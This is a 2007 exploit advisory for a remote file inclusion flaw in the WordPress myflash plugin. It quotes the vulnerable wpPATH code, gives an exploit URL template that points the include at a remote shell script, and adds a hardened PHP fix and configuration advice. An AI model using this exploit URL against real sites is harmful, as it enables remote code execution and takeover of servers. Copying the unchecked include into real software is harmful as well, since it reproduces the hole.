
# Title : Wordpress plugin myflash <= 1.00 (wppath) RFI Vulnerability
# Published : 2007-05-01
# Author : Crackers_Child


--------------------------------- [ The World Is So Treacherous ! ] --------------------------------------

Title : Wordpress plugin myflash <= V1.00  (wppath) RFI Vulnerability

--------------------------------------------------------------------------------
#Author: Crackers_Child


#cont@ct: cybermilitan@hotmail.com

--------------------------------------------------------------------------------


--------------------------------------------------------------------------------

Application :  Wordpress plugin

Web Site    :  http://alexrabe.boelinger.com/

--------------------------------------------------------------------------------
Vulnerable code in myflash-button.php:

if (!$_POST) $wppath=$_GET['wpPATH'];
else $wppath=$_POST['wpPATH'];

require_once($wppath.'/wp-config.php');
require_once($wppath.'/wp-admin/admin.php');

global $wpdb;
--------------------------------------------------------------------------------

Exploit:

http://[target]/[path]/wp-content/plugins/myflash/myflash-button.php?wpPATH=Shl3?

--------------------------------------------------------------------------------
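
Added example (not part of the original advisory or the plugin's own code): a hardened form of the wpPATH handling in myflash-button.php, which never lets a request-supplied string reach require_once unless it resolves to the installation's own root. The function name myflash_resolve_wp_root is hypothetical; the code assumes PHP 7+ and that the plugin sits in wp-content/plugins/myflash, as in the URL above.

```php
<?php
declare(strict_types=1);

/**
 * Return the WordPress root to load from, or null when the supplied value
 * does not resolve to the directory this plugin is installed under.
 * $pluginDir is the directory holding myflash-button.php
 * (assumed: <root>/wp-content/plugins/myflash, so the root is 3 levels up).
 */
function myflash_resolve_wp_root(?string $requested, string $pluginDir): ?string
{
    $expected = realpath(dirname($pluginDir, 3));
    if ($expected === false || !is_file($expected . '/wp-config.php')) {
        return null;                  // plugin is not inside a WordPress tree
    }
    if ($requested === null || $requested === '') {
        return $expected;             // nothing supplied: use the derived root
    }
    // Reject stream wrappers (http://, ftp://, php://, data:, ...) and NUL bytes.
    // Two or more characters before ':' so a Windows drive letter still passes.
    if (preg_match('#^[a-z][a-z0-9+.\-]+:#i', $requested)
        || strpos($requested, "\0") !== false) {
        return null;
    }
    // realpath() canonicalises ../ and symlinks and returns false for
    // anything that is not an existing local path.
    $resolved = realpath($requested);
    return ($resolved !== false && $resolved === $expected) ? $expected : null;
}

// Same precedence as the original code: POST first, then GET.
$raw = $_POST['wpPATH'] ?? $_GET['wpPATH'] ?? null;
$wppath = (is_string($raw) || $raw === null)
    ? myflash_resolve_wp_root($raw, __DIR__)
    : null;                           // arrays (wpPATH[]=...) are rejected

if ($wppath === null) {
    http_response_code(400);
    exit('Invalid wpPATH');
}

// Only the canonical, locally derived root is ever included.
require_once $wppath . '/wp-config.php';
require_once $wppath . '/wp-admin/admin.php';
```

Independently of the code fix, keeping PHP's allow_url_include directive set to Off prevents require_once from fetching a remote URL at all.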

greets:

Everybody

--------------------------------------------------------------------------------



--------------------------------- [http://www.biyosecurity.net ] --------------------------------------

# www.Syue.com [2007-05-01]